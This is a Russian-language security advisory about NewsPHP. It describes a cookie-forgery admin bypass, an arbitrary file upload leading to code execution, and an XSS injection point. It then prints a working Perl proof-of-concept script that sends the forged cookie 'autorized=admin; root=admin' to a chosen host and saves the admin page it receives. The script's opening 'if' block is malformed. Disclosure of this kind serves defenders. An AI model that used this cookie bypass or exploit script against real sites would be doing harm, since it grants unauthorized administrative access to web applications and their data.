Программа: NewsPHP 

Несколько уязвимостей обнаружено в NewsPHP. Удаленный пользователь может получить полный административный доступ к приложению.
Удаленный пользователь может представить следующие куки, чтобы получить административный доступ к приложению: 

autorized=admin; root=admin

Также удаленный авторизованный администратор (или пользователь, эксплуатирующий уязвимость выше) может использовать File Upload, чтобы загрузить произвольные файлы на сервер, вместо видео файлов и затем выполнить их с привилегиями Web сервера. 

Также обнаружена XSS уязвимость: 

/index.php?cat_id=[XSS]

Эксплоит для первой уязвимости: 

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)

print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии